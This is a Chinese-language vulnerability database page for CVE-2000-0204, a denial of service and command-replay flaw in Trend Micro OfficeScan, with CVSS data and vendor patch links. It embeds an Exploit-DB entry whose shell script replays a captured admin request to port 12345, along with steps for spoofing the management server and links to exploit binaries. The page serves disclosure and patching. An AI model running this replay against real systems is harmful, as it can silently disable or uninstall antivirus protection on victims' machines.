CVE-2000-0204
CVSS5.0
发布时间 :2000-02-28 00:00:00
修订时间 :2008-09-10 15:03:17
NMCOE    

[原文]The Trend Micro OfficeScan client allows remote attackers to cause a denial of service by making 5 connections to port 12345, which raises CPU utilization to 100%.


[CNNVD]Trend Micro OfficeScan远程拒绝服务攻击漏洞(CNNVD-200002-082)

        
        Trend Micro OfficeScan是一种针对整个网段的分布式反病毒软件。安装过程中会提示是否采用WEB管理方式。如果选择采用WEB管理方式,OfficeScan客户端将侦听12345/TCP端口,用于定期接收病毒数据库更新或者来自OfficeScan管理端的命令。
        远程攻击者有好几种办法对Trend Micro OfficeScan进行拒绝服务攻击。
        向12345/TCP发送随机数据,tmlisten.exe的CPU占用率将高达100%,并引发一个Visual C++错误,最终导致机器崩溃。
        向12345/TCP发送随机数据的同时,打开5个以上到该端口的TCP连接,该端口上的服务将停止响应。必须重启服务才能恢复正常。
        同一网段的用户可能利用Sniffer捕捉管理命令,修改后重新发往客户端,这些请求的最后两个字节意义如下:
        04: 远程卸载OfficeScan客户端
        06: 开始扫描
        07: 停止扫描
        OfficeScan客户端向OfficeScan管理端提交URL请求,获取一些配置信息。如果攻击者伪造了一台有效的OfficeScan管理端服务器,就可能更改OfficeScan客户端扫描策略,比如只扫描.txt文件,不扫描软盘、光盘,指示OfficeScan客户端将被感染文件移动到别的位置。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0204
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0204
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-082
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=D129BBE1730AD2118A0300805FC1C2FE038AF28B@209-76-212-10.trendmicro.com
(UNKNOWN)  BUGTRAQ  20000315 Trend Micro release patch for "OfficeScan DoS & Message Replay" V ulnerabilies
http://www.securityfocus.com/bid/1013
(UNKNOWN)  BID  1013
http://archives.neohapsis.com/archives/bugtraq/2000-02/0340.html
(UNKNOWN)  BUGTRAQ  20000226 DOS in Trendmicro OfficeScan
http://www.antivirus.com/download/ofce_patch_35.htm
(UNKNOWN)  MISC  http://www.antivirus.com/download/ofce_patch_35.htm

- 漏洞信息

Trend Micro OfficeScan远程拒绝服务攻击漏洞
中危 其他
2000-02-28 00:00:00 2005-10-20 00:00:00
远程  
        
        Trend Micro OfficeScan是一种针对整个网段的分布式反病毒软件。安装过程中会提示是否采用WEB管理方式。如果选择采用WEB管理方式,OfficeScan客户端将侦听12345/TCP端口,用于定期接收病毒数据库更新或者来自OfficeScan管理端的命令。
        远程攻击者有好几种办法对Trend Micro OfficeScan进行拒绝服务攻击。
        向12345/TCP发送随机数据,tmlisten.exe的CPU占用率将高达100%,并引发一个Visual C++错误,最终导致机器崩溃。
        向12345/TCP发送随机数据的同时,打开5个以上到该端口的TCP连接,该端口上的服务将停止响应。必须重启服务才能恢复正常。
        同一网段的用户可能利用Sniffer捕捉管理命令,修改后重新发往客户端,这些请求的最后两个字节意义如下:
        04: 远程卸载OfficeScan客户端
        06: 开始扫描
        07: 停止扫描
        OfficeScan客户端向OfficeScan管理端提交URL请求,获取一些配置信息。如果攻击者伪造了一台有效的OfficeScan管理端服务器,就可能更改OfficeScan客户端扫描策略,比如只扫描.txt文件,不扫描软盘、光盘,指示OfficeScan客户端将被感染文件移动到别的位置。
        

- 公告与补丁

        厂商补丁:
        Trend Micro
        -----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.antivirus.com/download/ofce_patch.htm

        Trend Micro OfficeScan Corporate Edition 3.0:
         Trend Micro Patch OfficeScan 3.0
         ftp://download.antivirus.com/products/officescan/office313(patch).zip
         OfficeScan 3.0用户必须首先升级至OfficeScan 3.11,然后再打OfficeScan 3.13补丁。
        
         Trend Micro Upgrade OfficeScan 3.0
         ftp://download.antivirus.com/products/officescan/osce311gm2.zip
         OfficeScan 3.0用户为了打OfficeScan 3.13补丁必须先安装该软件包
        Trend Micro OfficeScan Corporate Edition 3.5:
         Trend Micro Patch OfficeScan 3.5
         ftp://download.antivirus.com/products/officescan/osce351-1317.zip
        Trend Micro OfficeScan Corporate Edition 3.11:
         Trend Micro Patch OfficeScan 3.11
         ftp://download.antivirus.com/products/officescan/office313(patch).zip
         该补丁包将OfficeScan 3.11升级至OfficeScan 3.13
        Trend Micro OfficeScan Corporate Edition 3.13:
         Trend Micro Patch OfficeScan 3.13 Patch
         ftp://download.antivirus.com/products/officescan/office313(patch).zip

- 漏洞信息 (19780)

Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities (EDBID:19780)
multiple remote
2000-02-26 Verified
0 Jeff Stevens
N/A [点击下载]
source: http://www.securityfocus.com/bid/1013/info

Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. 

There are several ways for an attacker to cause various denial of service conditions.

Sending random data to port 12345 can cause tmlisten.exe to either consume 100% of the CPU cycles or cause a Visual C++ error and crash the machine.

Furthermore, opening over 5 simultaneous connections to port 12345 while sending random data will cause the service to stop responding to requests. The service will have to be stopped and restarted on each client machine.

It has also been reported that it is possible to cause a denial of service condition by making a single malformed GET request to port 12345.

It is also possible for a local user to capture an administrative command by using a network sniffer. This command can then be modified and replayed against other clients to cause them to perform a variety of actions. Modifying the last two bytes of the request will change the client's response behaviour, including:

04: full uninstallation of the OfficeScan client
06: launch a scan
07: stop a scan

The client makes requests to a few CGI programs on the server, which respond with configuration information. One of these CGIs is cgiRqCfg.exe, which provides configuration details for scan behaviour.

If an attacker were to set up a webserver with the same IP address as the valid server, duplicate the valid server's OfficeScan file structure, and disable the valid server, it would be possible to perform a more subtle DoS by leaving the client installed but modifying the config files to restrict the file types scanned, (for example: setting the client to only scan .txt files) or to restrict the types of drives scanned (for example: disabling scanning on removable, fixed, and CD-ROM drives). It is also possible to cause the client to move any infected files to any location on the local machine.

It should also be noted that some intrusion detection systems may detect attacks against port 12345 as Back Orifice attempts, which has the potential to conceal the nature of these attacks.

cgiRqCfg.exe provides to the client configuration settings which will disable scanning on all removable, fixed, and CDrom drives, and further will disable scanning for all files except those with the extension "YES IT's P0SS1bl3!"

cgiOnStart.exe will need to be put on the attacking webserver as the client expects it.

http://www.exploit-db.com/sploits/19780-1.exe

http://www.exploit-db.com/sploits/19780-2.exe

this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response.

#!/bin/sh
(
sleep 2
echo "GET/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906HTTP/1.0"
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt

Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef <marc.ruef@computec.ch>. This tool is a pre-compiled Windows binary with Visual Basic source.

http://www.exploit-db.com/sploits/19780-3.zip		

- 漏洞信息

6158
Trend Micro OfficeScan TCP Connection DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-02-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站